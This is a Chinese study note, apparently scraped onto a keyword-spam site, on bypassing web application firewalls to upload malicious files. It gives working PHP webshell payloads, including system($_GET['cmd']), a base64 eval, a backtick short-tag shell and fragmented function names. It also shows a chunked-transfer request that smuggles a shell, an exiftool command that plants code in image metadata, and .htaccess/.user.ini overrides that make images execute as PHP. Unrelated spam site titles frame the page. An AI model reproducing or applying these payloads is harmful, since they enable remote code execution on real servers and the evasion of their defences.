当前位置: 首页 > news >正文

手机网站仿站教程台州那家网站做的好

手机网站仿站教程,台州那家网站做的好,盐城网站建设包括哪些,网站具体流程文件上传漏洞绕过WAF学习笔记 1. WAF检测原理 WAF&#xff08;Web应用防火墙&#xff09;通过以下方式拦截文件上传攻击&#xff1a; 关键字匹配&#xff1a;检测文件名、内容中的敏感词&#xff08;如<?php、eval&#xff09;。 扩展名黑名单&#xff1a;拦截.php、.jsp…

文件上传漏洞绕过WAF学习笔记


1. WAF检测原理

WAF(Web应用防火墙)通过以下方式拦截文件上传攻击:

  1. 关键字匹配:检测文件名、内容中的敏感词(如<?phpeval)。

  2. 扩展名黑名单:拦截.php.jsp等危险扩展名。

  3. 文件头验证:检查文件魔数(如FFD8FF对应JPEG)。

  4. 流量特征分析:检测异常请求结构(如超长文件名、畸形HTTP包)。


2. 通用绕过技术

2.1 解析差异利用

  • 大小写混合sHell.PhP.Php(部分WAF未统一大小写)。

  • 特殊字符插入

    • 分号截断(IIS):shell.asp;.jpg → 解析为.asp

    • 换行符插入:filename="shell.p\nhp"(绕过正则匹配)。

  • 扩展名混淆

    • 多重扩展名:shell.php.jpg → 结合解析漏洞(如Apache解析最后有效扩展名)。

    • 非标准扩展名:.php7.phtml.phar(需环境支持)。


2.2 编码混淆

  • URL编码

    • shell.%70hp%70=p)→ 部分WAF不解码检测。

  • Unicode编码

    • shell.\u0070hp → 转换为shell.php

  • HTML实体编码

    • 文件名:shell.#112;hp#112;=p)。

  • Base64/Hex编码文件内容

    php

    <?= eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>  

2.3 分块传输(Chunked Encoding)

  • 绕过原理:WAF可能不解析分块传输的文件内容。

  • 示例

    http

    POST /upload HTTP/1.1  
    Transfer-Encoding: chunked  
    ​
    7\r\n  
    <?php \r\n  
    8\r\n  
    system($_GET['cmd']);\r\n  
    0\r\n  
  • 工具:Burp Suite的Chunked Coding Converter插件。


2.4 文件内容绕过

  • 图片马注入

    • 在图片元数据中插入代码(Exif注释、IPTC字段)。

    bash

    exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg  
  • 短标签与动态调用

    php

    <?= `$_GET[0]`?>  # 短标签  
    <?php $_GET['a']($_GET['b']); ?>  # 动态函数调用  
  • 代码碎片化

    php

    <?php $a = "syste"; $b = "m"; $a.$b("id"); ?>  

2.5 HTTP协议特性利用

  • 参数污染

    http

    POST /upload?filename=shell.jpg HTTP/1.1  
    Content-Disposition: form-data; name="file"; filename="shell.php"  
    • 部分WAF优先取URL参数中的文件名。

  • 多文件上传绕过

    • 在多个文件字段中插入恶意文件,WAF可能只检测第一个。


3. 针对特定WAF的绕过

3.1 云WAF(如Cloudflare、阿里云)

  • 缓存污染攻击

    • 上传合法文件触发缓存,再覆盖为恶意文件。

  • IP轮询绕过

    • 通过大量不同IP上传,绕过频率限制。

3.2 ModSecurity规则绕过

  • 已知规则缺陷

    • 使用非常规扩展名:.php%20(空格)、.php.(末尾点)。

    • 利用正则回溯限制:构造超长文件名耗尽WAF计算资源。


4. 高级技巧

4.1 .htaccess/.user.ini覆盖

  • .htaccess(Apache)

    复制

    AddType application/x-httpd-php .jpg  
  • .user.ini(PHP)

    复制

    auto_prepend_file=shell.jpg  

4.2 分片上传绕过

  • 上传文件分片后合并,绕过WAF对完整文件的检测。

4.3 0day漏洞利用

  • CVE-2023-XXXX:特定WAF未修复的解析漏洞(需持续跟踪)。

http://www.yayakq.cn/news/74048/

相关文章:

  • 网站宣传图网站后台空间满了怎么办
  • 给公司制作网站吗东莞新闻头条最新消息
  • wordpress是什么东西seo教程大秦英扬
  • 佛山专业做网站网站 流量攻击
  • 青州网站制作哪家好鄂尔多斯市建设厅官方网站
  • wordpress共用用户多站点wordpress代码混乱
  • 微信网站 教程电商类网站怎么做推广
  • 现在还可以做夺宝网站网站备案通过
  • 网站是用dreamer做的_为什么后台能进去前台进不去了网站建设招标合同要求
  • 提供企业网站建设定制电商有多少种方法推广
  • js网站页面效果中国互联网电视app下载安装
  • 佛山网站免费制作公众号开放域名的443端口
  • 广西东晋建设有限公司网站做ppt图片用的网站
  • 网站建设公司简介模板下载则么做网站
  • 理查德西尔斯做的网站织梦cms网站迁移
  • 深圳制作网站软件临沂搜索引擎网站推广
  • 昆山网站建设推广贵州中航建设集团网站
  • 来个网站吧好人一生平安百度贴吧网页制作个人介绍代码
  • 网站设计方案及报价单怎么样做一个自己的网站
  • 四字母域名建设网站可以吗海口网约车公司哪家好
  • 网站设计怎么样为自家企业做网站
  • 有哪些做问卷调查的网站好无锡开发公司
  • 下载做网站ftp具体步骤爱站seo工具
  • 如何通过网站后台修改网站织梦网站模板源码php
  • 做网站站长一年能赚多少钱设计公司调研报告
  • 百度上怎么做推广西安网站建站优化
  • 建湖网站建设建筑工程承包合同书
  • 网站设计标准做网站端口内容无法替换
  • 企业网站的开发与应用怎样做旅游视频网站
  • 资源seo网站优化排名宁波城乡建设网